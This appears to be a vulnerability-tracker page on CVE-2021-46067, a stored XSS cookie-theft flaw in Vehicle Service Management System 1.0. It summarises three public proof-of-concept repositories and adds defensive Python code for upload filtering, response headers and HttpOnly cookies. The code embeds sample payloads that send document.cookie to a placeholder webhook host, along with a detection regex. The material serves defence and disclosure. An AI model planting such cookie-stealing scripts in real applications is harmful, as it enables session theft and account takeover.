CVE-2021-46067

CRITICAL

In Vehicle Service Management System 1.0 - Cookie Theft via Malicious HTML Upload (Stored XSS)

Title source: llm

Exploitation Summary

EIP tracks 3 public exploit repositories for CVE-2021-46067, published by sanupl and plsanu.

AI-analyzed exploit summary: The tracked PoCs show how an authenticated attacker uploads malicious HTML files to the Vehicle Service Management System (MyAccount, User List and Settings sections). When another user opens the stored file, the embedded script sends that user's session cookies to an attacker-controlled webhook, leading to full account takeover.

Description

In Vehicle Service Management System 1.0, an attacker can steal the cookies, leading to Full Account Takeover.

Exploits (3)

nomisec WORKING POC · 1 star
by sanupl · poc
https://github.com/sanupl/CVE-2021-46067

This repository provides a functional proof-of-concept for CVE-2021-46067, demonstrating how an attacker can steal cookies via malicious HTML file uploads in the Vehicle Service Management System, leading to full account takeover.

Classification: Working PoC (95%)
Attack Type: XSS (stored, via HTML upload; cookie theft)
Complexity: Trivial
Reliability: Reliable
Target: Vehicle Service Management System 1.0
Auth required: yes
Prerequisites: admin access to the target system · ability to upload files in specific sections
devstral-2 · analyzed May 19, 2026
nomisec WORKING POC
by sanupl · poc
https://github.com/sanupl/Vehicle-Service-Management-System-Multiple-Cookie-Stealing-Leads-to-Full-Account-Takeover

This repository provides a functional proof-of-concept for CVE-2021-46067, demonstrating how an attacker can steal cookies via malicious HTML file uploads in the Vehicle Service Management System, leading to full account takeover.

Classification: Working PoC (100%)
Attack Type: XSS
Complexity: Trivial
Reliability: Reliable
Target: Vehicle Service Management System 1.0
Auth required: yes
Prerequisites: admin access to the target system · ability to upload files in specific sections (MyAccount, User List, Settings)
devstral-2 · analyzed May 19, 2026
nomisec WORKING POC
by plsanu · poc
https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-Cookie-Stealing-Leads-to-Full-Account-Takeover

This PoC demonstrates a cookie-stealing vulnerability in Vehicle Service Management System 1.0, leading to full account takeover via malicious HTML file uploads in multiple sections (MyAccount, User List, Settings). The exploit leverages XSS to exfiltrate session cookies to a third-party webhook.

Classification: Working PoC (100%)
Attack Type: XSS
Complexity: Trivial
Reliability: Reliable
Target: Vehicle Service Management System 1.0
Auth required: yes
Prerequisites: admin access to upload malicious HTML files · victim interaction to trigger the payload
devstral-2 · analyzed Feb 16, 2026
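The chain described in the exploitation summary and in all three PoC entries is: upload a file that the browser will render as HTML, have another user open it from the application's origin, and let the script read document.cookie and post it to a webhook. The block below is an added example, not code from the Vehicle Service Management System project or from the PoC repositories. It shows the two server-side controls that break that chain: an upload gate that rejects active content by extension and by content (so a renamed .jpg does not slip through), and the response headers that keep a stored upload from executing in the application's origin, plus the HttpOnly cookie flag that removes document.cookie as an exfiltration path. The sample files, the function names and the webhook.example host are constructed for illustration.

```python
"""Upload gate and response-header hardening for the file-upload -> stored
HTML -> cookie-theft chain described on this page.

Added example, not code from the Vehicle Service Management System project.
Function names, the 'webhook.example' host and the sample files are
constructed for illustration.
"""
import re
from typing import Dict, Tuple

# Extensions browsers will render as active content when served inline.
ACTIVE_EXTENSIONS = {"html", "htm", "xhtml", "xht", "svg", "shtml", "mhtml"}

# Byte patterns that make a file renderable as HTML/SVG even if the
# extension lies. Case-insensitive; checked on the first 4 KiB.
ACTIVE_CONTENT_RE = re.compile(
    rb"<\s*(script|html|body|iframe|svg|object|embed|meta)\b"
    rb"|\bon[a-z]+\s*="  # inline handlers such as onload=, onerror=
    rb"|javascript:",
    re.IGNORECASE,
)

# Constructed stand-in for the kind of HTML file the PoCs upload: a page that
# sends document.cookie to an attacker-controlled endpoint (placeholder host).
COOKIE_STEALER_HTML = (
    b"<html><body><script>"
    b"fetch('https://webhook.example/c?d=' + encodeURIComponent(document.cookie));"
    b"</script></body></html>"
)
# Constructed benign upload: PNG signature followed by filler bytes.
BENIGN_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
# Constructed disguised upload: SVG/HTML content behind an image extension.
DISGUISED_JPG = b"<svg onload=\"fetch('https://webhook.example/c?d='+document.cookie)\"></svg>"


def check_upload(filename: str, content: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason). Reject anything a browser could execute.

    Two independent checks: the extension (what the PoC uploads directly)
    and the bytes (what a renamed payload, or a sniffing browser, reveals).
    """
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext in ACTIVE_EXTENSIONS:
        return False, f"active content extension .{ext} not allowed"
    if ACTIVE_CONTENT_RE.search(content[:4096]):
        return False, "content looks like HTML/SVG regardless of extension"
    return True, "ok"


def download_headers(filename: str) -> Dict[str, str]:
    """Headers for serving stored uploads so that a file which slipped past
    the gate still cannot run in the application's origin."""
    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", filename)
    return {
        # Force a download instead of inline rendering.
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        # Stop browsers from upgrading a bogus MIME type to text/html.
        "X-Content-Type-Options": "nosniff",
        # If rendered anyway, it runs in an opaque origin with no script.
        "Content-Security-Policy": "sandbox; default-src 'none'",
    }


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie value that takes the session out of document.cookie.

    HttpOnly is what defeats the cookie-reading step of the PoCs; Secure and
    SameSite limit replay and cross-site sending of the value.
    """
    return f"session={session_id}; Path=/; HttpOnly; Secure; SameSite=Lax"


if __name__ == "__main__":
    for name, data in (("photo.png", BENIGN_PNG),
                       ("steal.html", COOKIE_STEALER_HTML),
                       ("avatar.jpg", DISGUISED_JPG)):
        print(name, check_upload(name, data))
    print(download_headers("report.pdf"))
    print(session_cookie_header("example-session-id"))
```

Of the three controls, the HttpOnly flag is the one that directly defeats what the PoCs do (reading document.cookie); the upload gate and the download headers stop the stored file from being a script-execution point in the first place, which also covers payloads that do not target cookies.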

Scores

CVSS v3.1 base score: 9.8 (Critical)
EPSS: 0.0514
EPSS percentile: 91.3%
Attack Vector: NETWORK
Vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Caveat: the vector string rates the issue as requiring no privileges (PR:N) and no user interaction (UI:N), while every PoC analysis above lists admin access to the upload sections as a prerequisite and one also lists victim interaction to trigger the payload. Treat the 9.8 as the published base score, not as a description of the exploit chain the PoCs implement.

Details

Status: published
Products (1): vehicle_service_management_system_project/vehicle_service_management_system < 1.0
Published: Jan 06, 2022
Tracked since: Feb 18, 2026